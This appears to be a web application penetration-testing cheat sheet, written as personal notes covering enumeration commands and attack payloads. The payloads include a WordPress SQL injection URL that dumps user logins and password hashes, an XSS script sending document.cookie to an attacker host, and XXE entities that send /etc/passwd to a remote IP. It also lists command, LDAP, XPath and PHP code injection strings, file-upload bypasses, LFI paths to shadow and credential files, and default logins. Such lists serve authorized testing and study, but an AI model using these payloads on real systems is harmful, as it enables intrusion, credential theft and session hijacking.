Enumeration

Good directory discovery tool:

$ git clone https://github.com/maurosoria/dirsearch.git;  cd dirsearch; python3 dirsearch.py  -u http://$ip/ -e .php

Directory discovery

$ gobuster -w /usr/share/wordlists/dirb/common.txt -u $ip

Nmap HTTP Form Fuzzer


$ nmap --script http-form-fuzzer --script-args 'http-form-fuzzer.targets={1={path=/},2={path=/register.html}}' -p 80 $ip
Testing

Nmap Check the server methods


$ nmap --script http-methods --script-args http-methods.url-path='/test' $ip


Test OPTIONS against every folder/file.

Test every GET/POST parameter against SQLI and RCE.

View code

run discovery tools

Test params for: sqli, rfi, lfi

Find hardcoded credentials

JBoss

JMX Console http://$ip:8080/jmxconcole/
War File

Joomla

configuration.php
diagnostics.php
joomla.inc.php
config.inc.php

Mambo

configuration.php
config.inc.php

Wordpress

setup-config.php
wp-config.php
Authentication
Drupal
$ droopescan scan -u $ip
Wordpress

Scan for known bugs:

$ wpscan http://$ip

Try exploit:

/wp-content/plugins/wp-forum/feed.php?topic=-4381+union+select+group_concat%28user_login,0x3a,user_pass%29+from+wp_users%23
Webdav

Test incorrect permissions:

$ cadaver http://$ip
$ davtest http://$ip
Bruteforcing

Good password list

https://raw.githubusercontent.com/danielmiessler/SecLists/master/Passwords/10_million_password_list_top_1000.txt
File uploads

Avoid extension checks using tricks like:

.php5.jpeg
.php5%00.jpeg

Different file formats

https://en.wikipedia.org/wiki/List_of_file_signatures

Different extensions

.php .php3 .php4 .php5
PHP

You can usually bypass file include filters with payloads like:

php://filter/convert.base64-encode/resource=file

If you control an include statenent such as

include("lang/".$_COOKIE['lang']);

You can set a cookie pointing to an arbitrary PHP file and have it executed in your page.

SSL certificates

Find out potential correct vhost to GET

is the clock skewed

Any names that could be usernames for bruteforce/guessing.

Login

Always try user root, admin, administrator with password letmein admin root

File downloads

Run strings against every file

XSS vectors

Invisible iframe:

<iframe src="http://attacker/" height="0" width="0"></iframe>

Steal cookies

<script> new Image().src="http://attacker/bogus.php?output="+document.cookie; </script>

Payload no space

<svg/onload=alert(1)>

filter bypass

<svg•onload=alert(1)>
Command injection
`id`
| id
&& id
error || id
%0a id

time based

sleep 10
LDAP injection
)
foo)
((cn=*)
(|(cn=[INPUT1])(cn=[INPUT2]))
(&(cn=[INPUT1])(userPassword=[INPUT2]))

Try wildcard * or partial match a*, ad*..

XPath injection
' and '1'='1
' or '1'='0
' and '1'='0
' or '1'='1
foo']%00
foo' or 1=1]%00
'%20or%201=1]/child::node()%00
PHP code injection
".system('id'); $a="
".system('id');#
".system('id');//
foo);}system('id');//
'.phpinfo().'
XML External Entity
<?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "file:///etc/passwd" > <!ENTITY callhome SYSTEM "bad.com/?%xxe;"> ] > <foo>&xxe;&callhome;</foo>
<?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "file:///etc/passwd" > ] > <foo>&xxe;</foo>

Send /etc/passwd to your box:

<!ENTITY % p1 SYSTEM "file:///etc/passwd"><!ENTITY % p2 "<!ENTITY e1 SYSTEM 'http://192.168.159.1:3001/BLAH?%p1;'>">%p2;
XML Injection

<!--/-->

ORM Injection

OR 1--

Header injection %0d%0a

Leads to open redirection and session fixation

RFI/LFI

Test it:

$ fimap -u "http://$ip/example.php?test="

Automated scanning

$ https://github.com/lightos/Panoptic/

Interesting payloads:

/etc/passwd | /etc/shadow #instant win
/var/www/html/config.php # or similar paths to get SQL etc creds
?page=php://filter/convert.base64-encode/resource=../config.php
../../../../../boot.ini # to find out windows version*
php://input
php://filter/convert.base64-encode/resource=../../../../../etc/passwd
/etc/issue
/proc/version
/etc/profile
/etc/passwd
/etc/shadow
/root/.bash_history
/var/log/dmessage
/var/mail/root
/var/spool/cron/crontabs/root
/proc/self/environ
/proc/self/cmdline
/proc/self/stat
/proc/self/status
/proc/self/fd/0
/proc/self/fd/1
/proc/self/fd/2
/proc/self/fd/3
/proc/self/fd/4
/proc/self/fd/5
/proc/self/fd/6
/proc/self/fd/7
/proc/self/fd/8
/proc/self/fd/9
/proc/self/fd/10
/proc/self/fd/11
/proc/self/fd/12
/proc/self/fd/13
/proc/self/fd/14
/proc/self/fd/15
/httpd/logs/access.log
/apache/logs/access.log
logs/access.log
/var/log/access_log
/var/log/httpd/access_log
/var/log/httpd-error.log
/var/log/apache/access.log
/var/log/apache2/access.log
/var/log/httpd-access.log
/var/log/httpd/access_log
/var/log/httpd/access.log
/var/www/html/index.php
/var/www/index.php
/var/www/manual/index.html
/etc/httpd/logs/access_log
/etc/httpd/logs/access.log
/etc/httpd/logs/error_log
/etc/httpd/logs/error.log
/var/log/apache2/access_log
/var/log/apache2/access.log
/var/log/apache2/error_log
/var/log/apache2/error.log
/var/log/apache/access_log
/var/log/apache/access.log
/var/log/auth.log
/var/log/chttp.log
/var/log/cups/error_log
/var/log/dpkg.log
/var/log/faillog
/var/log/httpd/access_log
/var/log/httpd/access.log
/var/log/httpd/error_log
/var/log/httpd/error.log
/var/log/lastlog
/var/log/lighttpd/access.log
/var/log/lighttpd/error.log
/var/log/lighttpd/lighttpd.access.log
/var/log/lighttpd/lighttpd.error.log
/var/log/messages
/var/log/secure
/var/log/syslog
/var/log/wtmp
/var/log/xferlog
/var/log/yum.log
/var/run/utmp
/var/webmin/miniserv.log
/var/www/logs/access_log
/var/www/logs/access.log
Test credentials

admin admin

admin password

admin <blank>

admin nameofservice

admin s3cret

root root

root admin

root password

root nameofservice

root s3cret

Other tricks

If there is a share link or a way to pass a URL that you can manipulate, try duplicating the parameters

If there is a UID parameter, try to replace it with another users one or do HPP passing both in different orders.

Intercept all the interesting requests, look for missing CSRF tokens in critical actions and try repeating them with them.

To bypass XSS filters: try submitting URL encoded strings, if decoded: bingo.

Restoring javascript functions javascript:document.write=HTMLDocument.prototype.write;document.write(‘STRUKT’);